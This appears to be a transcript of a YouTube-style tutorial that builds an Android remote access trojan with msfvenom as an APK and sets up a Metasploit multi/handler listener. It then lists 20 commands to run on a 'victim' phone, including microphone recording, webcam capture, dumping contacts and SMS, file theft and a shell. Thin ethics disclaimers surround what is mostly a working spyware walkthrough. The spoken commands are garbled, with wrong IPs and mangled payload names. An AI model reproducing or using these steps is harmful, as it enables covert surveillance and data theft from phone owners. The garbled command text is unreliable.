Android video. Disclaimer: this video is only for educational purposes. Everything you see here is shown inside a controlled environment. Misusing this knowledge can cause serious legal trouble. Blackstack is about cyber education, not cybercrime. Now, how can this be useful? Ethical hackers and penetration testers use Android RATs to test mobile app security, check organizational defenses, and simulate real-world attacks. But at the same time, in the wrong hands, this can be extremely ungrateful, stealing data, spying, and destroying privacy. That's why we need ethics. So let's move on to Kali Linux. We start by filling username and password. Both are case sensitive and all in lowercase, Kali. Now let's open terminal. We'll start as super user with sudo su. It will ask for password. Again, type Kali in lowercase. First, let's update our system and install Metasploit Framework. Once that's done, let's check if our main tool exists. Run msfvenom help. We got the output, which means msfvenom is already installed. Now let's try to find our computer IP using ifconfig. Looks like my virtual machine has some issues, so it's not showing the IP. In your system, it will show your IP. For now, I'll proceed with localhost. Now let's build our Android RAT. The command is msfvenom-p androids meterpreter / reverse score tcp lhost equal 27.0.1 lport equals 3333r rat.apk. Let me quickly break this down. -p means payload. Android / meterpreter's reverse TCP is the payload type for Android. Lhost is the IP where we want connection back. Here it's 127.00.1. Lport is the port. We used 3333. R tells it to output raw format, and then we saved it into rat.apk. Now this output shows our RAT file is built. Let's open File Explorer and check the location. Go to /home Kali. Here you can see our rat.apk file. Now if the target installs it ethically with permission, then we'll get full access to their device. But how do we accept the connection from a victim device? We open Metasploit by typing msf console, then we set it up. Use exploit multi/handler, set payload Android meterpreter reverse TCP, set lhost 127.0.1, set lport 3333. Run. Here's the breakdown. The handler waits for connections. We set the same payload type as we used in msfvenom. We set host and port same as before. Run will start the listener. Currently, I don't have an Android phone available to test this live. I even tried running it on another Android virtual machine, but I couldn't get the VM installed properly. So I can't show you the simulation. But after running these commands, once the victim installs and opens the APK, you will see a session open inside Metasploit. Now, what can you do when you get access? Here are 20 powerful commands you can run on the victim device. 1. sysinfo shows system information. 2. getuid shows current user. 3. pwd shows current working directory. 4. ls lists files. 5. cd change directory. 6. download a file from victim. 7. upload a file to victim. 8. cat read file contents. 9. screenshot capture screen of victim device. 10. record mic record from the microphone. 11. webcam list available cameras. 12. webcam snap take a photo from camera. 13. webcam stream start live stream from camera. 14. dump contacts get all saved contacts. 15. dump SMS read all SMS messages. 16. check root check if device is rooted. 17. app list installed applications. 18. shell open a full Linux shell on victim. 19. ps list running processes. 20. kill stop a process. These commands give you a clear idea of how powerful a RAT can be. But remember, power always comes with great responsibility. Used properly, this is a great tool for penetration testing and defense. Used wrongly, it becomes a weapon for destruction. Stay ethical. Always. Final disclaimer, this video is for education only. Don't misuse it. So guys, that was the end of this tutorial. If you learned something new, please like, share, and subscribe. Support keeps Blackstack alive. I'll see you in the next video. Until then, stay sharp, stay ethical. Bye-bye.